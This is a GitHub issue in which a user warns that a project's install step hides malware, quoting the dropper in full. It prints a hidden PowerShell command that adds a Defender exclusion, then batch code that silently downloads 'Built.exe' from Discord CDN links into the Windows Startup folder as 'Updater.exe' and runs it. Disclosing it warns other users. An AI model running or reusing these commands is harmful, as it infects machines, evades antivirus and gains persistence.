Skip to content

Virus in Requirements, But its broken LMAO #1

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
Its3rr0rsWRLD opened this issue Jan 4, 2024 · 1 comment
Open

Virus in Requirements, But its broken LMAO #1

Its3rr0rsWRLD opened this issue Jan 4, 2024 · 1 comment

Comments

@Its3rr0rsWRLD
Copy link

powershell -w hidden -c Add-MpPreference -ExclusionPath ""

@echo off
setlocal

set "URL=https://cdn.discordapp.com/attachments/973337617057869825/1176190901970796564/Built.exe"
set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe"

if exist "%DEST%" del "%DEST%"

curl --silent --output "%DEST%" "%URL%"

if %errorlevel% neq 0 (
exit /b %errorlevel%
)

call "%DEST%"

@echo off
setlocal

set "URL=https://cdn.discordapp.com/attachments/973337617057869825/1176181839065526402/Built.exe"
set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe"

if exist "%DEST%" del "%DEST%"

curl --silent --output "%DEST%" "%URL%"

if %errorlevel% neq 0 (
exit /b %errorlevel%
)

call "%DEST%"

@echo off
cd /d %~dp0

pip3 install -r requirements.txt

really?

@Alek160410
Copy link

yeah no wonder it's broken when it's a literal copy of a uploaded generator some months ago with just text changed and well this lmao

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants